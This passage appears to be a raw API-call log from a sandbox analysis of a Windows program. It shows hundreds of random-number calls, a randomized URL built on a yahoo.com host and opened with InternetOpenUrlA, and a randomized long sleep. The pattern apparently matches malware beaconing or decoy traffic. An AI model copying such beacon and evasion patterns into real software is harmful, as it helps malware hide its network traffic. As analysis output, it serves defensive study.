0x7ffc5bcc36b0 [0232.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0232.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0232.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d64e4, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x4d64e4) returned 0x0 [0232.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0232.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0232.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0232.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0232.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6502, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x4d6502) returned 0x0 [0232.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.669] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.670] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.673] GetProcessHeap () returned 0x440000 [0232.674] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0232.674] lstrcpyA (in: lpString1=0x472f30, lpString2="\x8cÆoÍs://www.yahoo.com" | out: lpString1="\x8cÆoÍs://www.yahoo.com") returned="\x8cÆoÍs://www.yahoo.com" [0232.674] lstrcatA (in: lpString1="\x8cÆoÍs://www.yahoo.com", lpString2="/4t8RnqzhIoc6srpReU2tdcaXgyw1/vzx4kbkLlm8o96P1Vrc6jsvTlRce3s5x4vpix/M0ks9y8uoAQoX2hjpGMrypyx1rndm/wywvo0bzukfswfgr19x3ef/" | out: lpString1="\x8cÆoÍs://www.yahoo.com/4t8RnqzhIoc6srpReU2tdcaXgyw1/vzx4kbkLlm8o96P1Vrc6jsvTlRce3s5x4vpix/M0ks9y8uoAQoX2hjpGMrypyx1rndm/wywvo0bzukfswfgr19x3ef/") returned="\x8cÆoÍs://www.yahoo.com/4t8RnqzhIoc6srpReU2tdcaXgyw1/vzx4kbkLlm8o96P1Vrc6jsvTlRce3s5x4vpix/M0ks9y8uoAQoX2hjpGMrypyx1rndm/wywvo0bzukfswfgr19x3ef/" [0232.674] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0232.674] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x8cÆoÍs://www.yahoo.com/4t8RnqzhIoc6srpReU2tdcaXgyw1/vzx4kbkLlm8o96P1Vrc6jsvTlRce3s5x4vpix/M0ks9y8uoAQoX2hjpGMrypyx1rndm/wywvo0bzukfswfgr19x3ef/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0232.674] GetProcessHeap () returned 0x440000 [0232.674] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0232.674] GetProcessHeap () returned 0x440000 [0232.674] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d64a0 | out: hHeap=0x440000) returned 1 [0232.674] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0232.674] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0232.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0232.675] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0232.675] Sleep (dwMilliseconds=0x18f6e) [0232.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0232.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0232.949] GetProcessHeap () returned 0x440000 [0232.949] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5870 [0232.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0232.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5871, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x4f5871) returned 0x0 [0232.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 